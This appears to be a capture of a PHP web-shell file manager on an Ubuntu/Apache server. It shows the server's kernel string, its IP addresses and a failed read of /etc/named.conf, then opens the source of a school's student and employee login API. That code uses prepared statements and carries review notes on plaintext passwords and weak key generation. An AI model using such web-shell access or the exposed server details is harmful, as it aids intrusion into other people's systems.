Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.15.209.178
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
/
var /
www /
html /
kusdde_tobedeleted /
adm /
includes /
Name
Size
Permission
Action
_htaccess
58
B
-rwxr-xr-x
dbconnect.php
456
B
-rwxr-xr-x
functions.php
5.85
KB
-rwxr-xr-x
functions_old.php
6.08
KB
-rwxr-xr-x
payu.php
15.75
KB
-rwxr-xr-x
serverConfig.php
381
B
-rwxr-xr-x
Code Editor : functions.php
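<?php

/**
 * Prepare $sql on $con, bind every entry of $params as a string and execute it.
 *
 * All caller-supplied values travel as bound parameters, never as SQL text,
 * so quotes or SQL keywords inside a username, password or device field
 * cannot change the statement.
 *
 * @param mysqli $con    Open mysqli connection.
 * @param string $sql    Statement text using only ? placeholders.
 * @param array  $params Values in placeholder order.
 * @return mysqli_stmt|false Executed statement (the caller closes it), or false on failure.
 */
function loginApiExecute($con, $sql, array $params)
{
    $stmt = mysqli_prepare($con, $sql);
    if ($stmt === false) {
        return false;
    }

    if (count($params) > 0) {
        $params = array_values($params);
        $types = str_repeat('s', count($params));
        // bind_param takes its values by reference; unpacking an array satisfies that.
        if (!mysqli_stmt_bind_param($stmt, $types, ...$params)) {
            mysqli_stmt_close($stmt);
            return false;
        }
    }

    if (!mysqli_stmt_execute($stmt)) {
        mysqli_stmt_close($stmt);
        return false;
    }

    return $stmt;
}

/**
 * Run a parameterized SELECT and return every row as an associative array.
 *
 * Uses bind_result rather than get_result so it does not depend on the
 * mysqlnd driver being present.
 *
 * @param mysqli $con    Open mysqli connection.
 * @param string $sql    SELECT text using only ? placeholders; column names must be unique.
 * @param array  $params Values in placeholder order.
 * @return array|false List of rows keyed by column name, or false on failure.
 */
function loginApiSelect($con, $sql, array $params)
{
    $stmt = loginApiExecute($con, $sql, $params);
    if ($stmt === false) {
        return false;
    }

    $meta = mysqli_stmt_result_metadata($stmt);
    if ($meta === false) {
        mysqli_stmt_close($stmt);
        return false;
    }
    $names = array();
    foreach (mysqli_fetch_fields($meta) as $field) {
        $names[] = $field->name;
    }
    mysqli_free_result($meta);

    // Buffer the result so the connection is free for the next statement.
    mysqli_stmt_store_result($stmt);

    $cells = array_fill(0, count($names), null);
    mysqli_stmt_bind_result($stmt, ...$cells);

    $rows = array();
    while (mysqli_stmt_fetch($stmt)) {
        $row = array();
        foreach ($names as $index => $name) {
            // Plain assignment copies the value out of the bound reference.
            $row[$name] = $cells[$index];
        }
        $rows[] = $row;
    }
    mysqli_stmt_close($stmt);

    return $rows;
}

/**
 * Run a parameterized INSERT/UPDATE.
 *
 * @param mysqli $con    Open mysqli connection.
 * @param string $sql    Statement text using only ? placeholders.
 * @param array  $params Values in placeholder order.
 * @return bool True when the statement executed, false otherwise.
 */
function loginApiWrite($con, $sql, array $params)
{
    $stmt = loginApiExecute($con, $sql, $params);
    if ($stmt === false) {
        return false;
    }
    mysqli_stmt_close($stmt);

    return true;
}

/**
 * Validate a student login, make sure the account has an API key, and record
 * the device that logged in.
 *
 * The username is upper-cased before use. A blank username or password
 * (anything empty() treats as empty, which includes the string "0") is
 * rejected before any query runs. On success the function returns the
 * account's API key and the student's name, class and section, updates
 * masuser.flastlogin, and inserts or refreshes the deviceinfo row for the user.
 *
 * Every query is a prepared statement; the original built SQL by
 * interpolating the request values, which allowed SQL injection through any
 * of the seven string arguments.
 *
 * @param string $user         Login name (matches masuser.fusername).
 * @param string $pass         Password as submitted.
 * @param string $deviceID     Push-notification token of the device.
 * @param string $deviceDate   Date string stored in deviceinfo.fdate.
 * @param string $manufacturer Device manufacturer.
 * @param string $product      Device product name.
 * @param string $model        Device model.
 * @param mysqli $con          Open mysqli connection.
 * @return array Keys statusCode ('1' success, '0' failure), statusMessage,
 *               admno, studentName, apikey, instCode, branchCode, section,
 *               class. Fields that could not be looked up stay ''.
 */
function checkLoginCredentials($user, $pass, $deviceID, $deviceDate, $manufacturer, $product, $model, $con)
{
    $genericFailure = 'oops!!! Something went wrong.. Please try again';

    // Key order is kept as in the original response.
    $response = array(
        "statusCode" => '',
        "statusMessage" => '',
        "admno" => '',
        "studentName" => '',
        "apikey" => '',
        "instCode" => '',
        "branchCode" => '',
        "section" => '',
        "class" => '',
    );

    $user = strtoupper((string) $user);

    if (empty($user)) {
        $response['statusCode'] = '0';
        $response['statusMessage'] = 'Username is blank.';
    }
    if (empty($pass)) {
        // When both are blank the password message wins, as before.
        $response['statusCode'] = '0';
        $response['statusMessage'] = 'Password is blank.';
    }
    if ($response['statusCode'] === '0') {
        return $response;
    }

    // NOTE(review): fpasswd is compared directly with the submitted password,
    // so the column appears to hold plaintext passwords. Moving to
    // password_hash()/password_verify() needs a schema change outside this
    // function and is not attempted here.
    $accounts = loginApiSelect(
        $con,
        'SELECT fusername, fapikey FROM masuser WHERE fusername = ? AND BINARY fpasswd = ?',
        array($user, $pass)
    );

    // A failed query or a duplicate account is treated as a failure, never as a login.
    if ($accounts === false || count($accounts) > 1) {
        $response['statusCode'] = '0';
        $response['statusMessage'] = $genericFailure;
        return $response;
    }
    if (count($accounts) === 0) {
        $response['statusCode'] = '0';
        $response['statusMessage'] = 'Wrong username or Password.Login Failed.';
        return $response;
    }

    $account = $accounts[0];
    $admno = $account['fusername'];
    $response['statusCode'] = '1';
    $response['statusMessage'] = 'Success';
    $response['admno'] = $admno;
    $response['branchCode'] = "1";

    // First login: no API key stored yet, so create one.
    if (empty($account['fapikey'])) {
        // NOTE(review): str_shuffle() is not a cryptographically secure source,
        // and the key embeds the first two password characters and the
        // username. The format is kept unchanged because other code may depend
        // on it; replace it with an opaque CSPRNG token once callers are checked.
        $alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
        $key = substr(str_shuffle($alphabet), 1, 30);
        $newApiKey = substr($pass, 0, 2) . $user . $key . substr($user, 4, 8);

        loginApiWrite(
            $con,
            'update masuser set fapikey = ? where fusername = ? AND fpasswd = ?',
            array($newApiKey, $admno, $pass)
        );
    }

    // Read the key back so the response reflects what is actually stored.
    $keyRows = loginApiSelect(
        $con,
        'select fapikey from masuser WHERE fusername = ? AND fpasswd = ?',
        array($user, $pass)
    );
    if ($keyRows !== false && count($keyRows) > 0) {
        $response['apikey'] = $keyRows[0]['fapikey'];
    }

    // Only the three columns the response uses are selected.
    $studentRows = loginApiSelect(
        $con,
        'select s.fname as studentName, s.fsection as fsection, d.fdescpn as class '
        . 'from student s, degree d '
        . 'where s.fdegree = d.fdegree and s.fexamno = d.fexamno and fadmno = ?',
        array($user)
    );
    if ($studentRows !== false && count($studentRows) > 0) {
        $response['section'] = $studentRows[0]['fsection'];
        $response['studentName'] = $studentRows[0]['studentName'];
        $response['class'] = $studentRows[0]['class'];
    }

    // Best-effort bookkeeping: a failure here does not fail the login.
    loginApiWrite(
        $con,
        'update masuser set flastlogin = now() where fusername = ? AND fpasswd = ?',
        array($user, $pass)
    );

    // Store the push-notification token: insert when the user has no
    // deviceinfo row, update when the stored token differs from the one sent.
    $deviceRows = loginApiSelect(
        $con,
        'select fdeviceid from deviceinfo where fusername = ?',
        array($user)
    );
    if ($deviceRows !== false && count($deviceRows) === 0) {
        loginApiWrite(
            $con,
            'insert into deviceinfo (fusername,fdeviceid,fdate,manufacturer,product,model,updatedby) '
            . "values (?,?,?,?,?,?,'LOGINAPI')",
            array($user, $deviceID, $deviceDate, $manufacturer, $product, $model)
        );
    } elseif ($deviceRows !== false && count($deviceRows) === 1) {
        $currentMobileToken = $deviceRows[0]['fdeviceid'];
        if ((string) $currentMobileToken !== (string) $deviceID) {
            loginApiWrite(
                $con,
                'update deviceinfo set fdeviceid = ?, fdate = ?, manufacturer = ?, product = ?, model = ?, '
                . "updatedby = 'LOGINAPI' where fusername = ?",
                array($deviceID, $deviceDate, $manufacturer, $product, $model, $user)
            );
        }
    }

    return $response;
}

/**
 * Check an employee login against masemp.
 *
 * The lookup is a prepared statement; the original interpolated all three
 * request values into the SQL text.
 *
 * @param string $user    Employee code (masemp.fempcode).
 * @param string $pass    Password as submitted.
 * @param string $empName Employee name (masemp.fempname).
 * @param mysqli $con1    Open mysqli connection.
 * @return string 'Username is blank.', 'Password is blank.', 'Success' when at
 *                least one row matches, otherwise 'Invalid' (also returned
 *                when the query itself fails).
 */
function checkLoginDetails($user, $pass, $empName, $con1)
{
    if (empty($user)) {
        return 'Username is blank.';
    }
    if (empty($pass)) {
        return 'Password is blank.';
    }

    // NOTE(review): as in checkLoginCredentials, fpasswd appears to be stored in plaintext.
    $matches = loginApiSelect(
        $con1,
        'SELECT fempcode FROM masemp WHERE fempcode = ? AND BINARY fpasswd = ? and fempname = ?',
        array($user, $pass, $empName)
    );

    if ($matches !== false && count($matches) >= 1) {
        return 'Success';
    }

    return 'Invalid';
}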